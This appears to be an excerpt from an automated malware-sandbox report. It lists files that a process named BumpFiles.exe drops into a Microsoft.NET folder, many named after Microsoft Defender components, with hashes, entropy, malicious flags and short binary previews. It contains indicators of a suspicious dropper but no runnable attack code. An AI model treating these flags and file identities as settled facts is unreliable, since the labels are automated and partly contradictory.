Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

C:\Program Files (x86)\Microsoft.NET\ProtectionManagement_Uninstall.mof

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	2664
Entropy (8bit):	3.464075447819169
Encrypted:	false
SSDEEP:	24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
MD5:	C4E26C53F76774E091FEE17FFFF64414
SHA1:	5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
SHA-256:	5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
SHA-512:	635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.R.o.l.l.b.a.c.k.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.

C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165208
Entropy (8bit):	7.110142692986595
Encrypted:	false
SSDEEP:	3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
MD5:	EBEA28C15DD26C1D0C1944215F0AAE8B
SHA1:	98375B311B8D56DA260961217073B30D1AEFE089
SHA-256:	E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
SHA-512:	05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......W.........." .........P...............................................`............`.......................................................... ...<...........`..X%..............T............................................................................rdata..............................@..@.rsrc....<... ...@... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	403816
Entropy (8bit):	6.1451106536127735
Encrypted:	false
SSDEEP:	6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
MD5:	FBAA9986931D1ADEDA07A6EF8F04AB6D
SHA1:	5FB959351940EB94EEF9D8E21D95436B77FEB9A2
SHA-256:	3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
SHA-512:	A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.u.3..,3..,3..,'..-1..,V..-2..,V..-2..,'..-9..,'..-!..,:.,!..,'..-...,V..-&..,3..,...,'..-]..,'..,2..,'..-2..,Rich3..,........................PE..L.....,......................L.......H............@..........................@.......Q........... ..............................\|....0..................h/......,F.....T...........................H...........................`....................text............................... ..`.data....).......$..................@....idata... ......."..................@..@.didat..(.... ......................@....rsrc........0......................@..@.reloc..,F.......H..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25936
Entropy (8bit):	4.328275985676387
Encrypted:	false
SSDEEP:	192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
MD5:	4A8B58C88DF1C607A9DF21EE390CA8F8
SHA1:	18B995CA90D74D34975F9DF8E8611F35E7B94E9D
SHA-256:	1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
SHA-512:	1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....f............" .........0...............................................@............`.......................................................... ..0............@..P%..............T............................................................................rdata..............................@..@.rsrc...0.... ... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	587096
Entropy (8bit):	5.955146470563534
Encrypted:	false
SSDEEP:	6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
MD5:	2776A2B1C9D82F3FEBAA8CA1F5544992
SHA1:	28620B6498EEFA4E411686FEAC1C0E03D66B661D
SHA-256:	D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
SHA-512:	2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...................................................................................Rich............................PE..d...+WSF.........."..........P.................@..................................................... ...........................................................6......X%......x...TY..T......................(.......@...............`............................text...L}.......................... ..`.rdata..............................@..@.data...`Q...0...P...0..............@....pdata...6.......@..................@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ThirdPartyNotices.txt

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	ASCII text, with very long lines (467), with CRLF line terminators
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	4.900567214358779
Encrypted:	false
SSDEEP:	24:8uSJLsnMRsAvARsADXWBDk44IuNhbgU0E+4HQk1LpsLtbY:89LsnMRsgARsqXWBDB4Tvr06H319ou
MD5:	314CE81BED1547B8FA40F405F4C8B9FC
SHA1:	6A1A717B275B90BA77A43EF77FCDEDBC7E6F7CE2
SHA-256:	00D799DC04FBDF92BC39218C22723C61C3204A82B1FC418E6AEA65E6ED111CE8
SHA-512:	143A0D92659BB088F2282BDB14F465D58EA9E0E57D261741CC9AC7B507BE730F4B0A62E9A9BF0B73BF19FDF6F44F2977E2C77875E28AC30E461155BDDB59A047
Malicious:	false
Preview:	Files originating with or related to Casablanca v2.6.0, a "Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services." See https://github.com/Microsoft/cpprestsdk. This material is licensed under the terms of the Apache Software License v2.0 (see https://github.com/Microsoft/cpprestsdk/blob/master/license.txt), which state:.... ==++==.... Copyright (c) Microsoft Corporation. All rights reserved. .. Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. .. Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for

C:\Program Files (x86)\Microsoft.NET\bin01.zip

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	data
Category:	dropped
Size (bytes):	142
Entropy (8bit):	6.55447018279355
Encrypted:	false
SSDEEP:	3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
MD5:	57A37BD0840D0745A9481BCC25B5A792
SHA1:	E8B7C744981C0713DE5EBB308897EFCBD374FD11
SHA-256:	E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
SHA-512:	08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
Malicious:	false
Preview:	H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	3.2580418248791343
Encrypted:	false
SSDEEP:	24:eH1GSp85gpXsFCZIN/at1IyBIZW0sTf5cnaw7ScNffz745U35WWdPfPN3Tc:ypK2BZ+W1I8IZWPTf5EdHffA5K5Ww13g
MD5:	EE08DF3A08F49B9A7239F0DE796E5DD0
SHA1:	461A532C71E6C20FB529F340CDF89DB4845200AF
SHA-256:	5959174D18270B856CF01B69223623E231AEF539F71B20336E0BE764F4C632F5
SHA-512:	7E6274FB38113EF69B132C5687EC4E08FFD09A4C1CA85B82441470D20AABBB55814E97EF8EE6DFA08A377719FB71ABA6A94F1217554C3463173AF12F93038222
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0.......\|....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	50688
Entropy (8bit):	3.394595207496583
Encrypted:	false
SSDEEP:	768:QJbyt33c7EhrdTTm147vXahEzhEthEGQRQwhEfSm:QJbytHu6rdd7vM+4Ivm
MD5:	4CFEF0FE4901B062F4B169B97F8CFD31
SHA1:	3ABE261FA1E8625FE3155B0D4B98D0D5903E1E1C
SHA-256:	5A89EBF5211FE4E51ED4D5D8FE1FEEC591A67F2F1632C6C0873CB44028386F43
SHA-512:	B1D8D65B6E781019618119F71500EC082018E11DF5562C878E34E1EC54FEF770F6B9F095A10D22B550FE137F1177057B507A1845048BA170EC762AAFB21D52CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................~e....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	3.4967857595832523
Encrypted:	false
SSDEEP:	384:ZtOioFEr4H1O/Dtkby/g1mwhqfB9hy0VkkWoBFH1ANl8CWupBW4:MBHI//1ANl8yp5
MD5:	FF86B38C73EED57883F04E1E61C3A213
SHA1:	6DD75F604393D70288AA1E28392AB83701B67650
SHA-256:	A7303F3077D7890C7CB889C7DD4A913BB0E5AB94E8DD190F258C85BF0A81AC28
SHA-512:	AAD695468C28F5E02DF5171294151BFA3A96D97203661C7278B4F2D37C167D8A6DE48A6AE9E50BCA6083A5E968497FEFC7526B2FCAB1A1F2396421A187CA798E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... .................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	3.57992330655092
Encrypted:	false
SSDEEP:	192:WWFmd28sT8KF7Y1+z7YNiuErC0IQ3obWNfpW7:zYd28sT1F7Y1+z7YNiuErC0IQ3YWNfp0
MD5:	E38287B098C2A55EE69A224BE73C93E8
SHA1:	0422464BBDA490FBC74896494318B5A141CF2710
SHA-256:	B61780AE34673BF797B85387036E01A03DB9F3D949BC23AD87EFD0A1D7EBA03E
SHA-512:	9126D8CDA5E1E898D443B9A6B8757F0FC205E599DE84241C0F0418857FA0D30DE1885AD5D04E539476500C15C6BEB4E2AB438564B7A6DDD3E7A898621059C6C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	3.529446079422097
Encrypted:	false
SSDEEP:	96:ZqJtrkDSJ6Spy99V9KzEcEKLqmqYgAMkL1J+8PUnW4+EW6brWwg:ZqJOvDAzzgYR7AW4TW6brWD
MD5:	D186BEDACDCCA084DA65C65D598EBCA8
SHA1:	3C48928EC8FE199545C0AD5ADEE27A5AC61E3D99
SHA-256:	363B8713FA608B54832C5F78E17331D94F0E888B98A0337467B5B1A5A18E7B75
SHA-512:	4B1774C4200BCD1161C8B00A9D5FFF11B6FDE35559531A578DA0EE6ED97A255FFF4FFC2B3C1E28DFCCCD2D77E616B92F91749F4BFD2999C105A00809C2D1359E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	3.534239180172005
Encrypted:	false
SSDEEP:	768:zFMCgGn67PzUf+YXIurmXuQmMVhjhxpIE:z2CpjZXIVXPiE
MD5:	3C50201BA7B59C83412E463689D9798B
SHA1:	A97F6D79D365B72F0AADCF2EA0B77C1FBD0940E3
SHA-256:	DD449C37F48009C37ADA9339185E8B30A50CC97F17E2979AFBE04B9A40F2B26A
SHA-512:	32DFF7044961E0254E38D592734F1B2566D4F079DE1611C6866F437F7DA9F2B257A89CA84C46D832B8CCA394866BF60B6203DAC2DD680C11FAC17A2D72BB23EC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................d....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.mfl

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with very long lines (11632), with CRLF line terminators
Category:	dropped
Size (bytes):	95866
Entropy (8bit):	3.503699910346522
Encrypted:	false
SSDEEP:	768:r7EIEB87ovwzUHfRWKXdxXMJHro8ozUUCaOZ5f5XPu1QcQBQEY46bY4814OT6/5k:rK4GXMa4BXPrY46bY48iOO/2
MD5:	675269F40380DCD00A2E2144A57F610A
SHA1:	B663129AD88776319E98519784CE2B21765AB196
SHA-256:	87E91B7FE6743B8DF9379E109B543D5BF6F41AB16198BB0DAD78D1C249D61B1F
SHA-512:	0E79DE4580FBC1E44DEB12AF91052125D0860574C4B2CBD9DCFB6F02DA6A568BCD11C34E35EAF403E78F112FC532FE5138C5FE0E5D43348483BD5A72F93DD65D
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.0.9.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.

C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement_Uninstall.mfl

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1118
Entropy (8bit):	3.459513705694916
Encrypted:	false
SSDEEP:	24:QXbclTUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvlR:enjDGwJ3r24RFZC
MD5:	AFE6664D26D5D05B4568E329BE37D7DE
SHA1:	2F6FD02E26E9F3A09866F3C106A8C1539B50D46F
SHA-256:	B6BAC201F1586B4C357521C46421086557A0DF86A022B120B723EB047E450D43
SHA-512:	8C1AF20BF892C303F8247B6E991A96A59CB0C65AB7E11C630282AA1B091FAEA8B27AA08210249FE2B47FA9488834E82487490581B54B236461FE61CF346F623E
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.

C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	3.3889790046988564
Encrypted:	false
SSDEEP:	48:ypY55M0IyyS/kVrx1TIZWqHWq6sffm0/iy5Ww13/:73IakVrvTEWiH5Wwd
MD5:	C99D5885AAB799E23E6E5498D0D1B07C
SHA1:	33450BDC3CDA46CEC0AF5467826143C46624E597
SHA-256:	C789A39DE6F9DF1A85BDB495D7F9955E1F673FBDBC0B77863D4595A4C4DA82F4
SHA-512:	8E583EBCC5A867E38BBB0A8A9EE40976AE949A130E2C4DB7B7CB82B3E815E3E785E15411BA4AADCF84ABCA8783E02D09FDDBAE736C3F326EC851D1B2193EC3B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0......W.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	685328
Entropy (8bit):	6.2613956335812
Encrypted:	false
SSDEEP:	12288:pRCT1SH7y45rUcOoza9hW+WSAh7Z1a6MLoloKfihqPgwX:pySH7yGUI+WL7ra6MLolrfihqh
MD5:	113DB043FE13F4635D0A65FDF100CFD3
SHA1:	1DF847E5E1680669FE0DF779B66942C521B47012
SHA-256:	716BA8B125E70C4D717262381B3A31203C41442B680651729ADF12059B53123F
SHA-512:	0B66C78C11DF7FCB8971FDB658D9372E06CC2A0D5AA116864E2D79099E660FB1A9F40368BFE590C6CCE5AA07DA592F89F0327D8EC02467EFBF720860C47BEB16
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
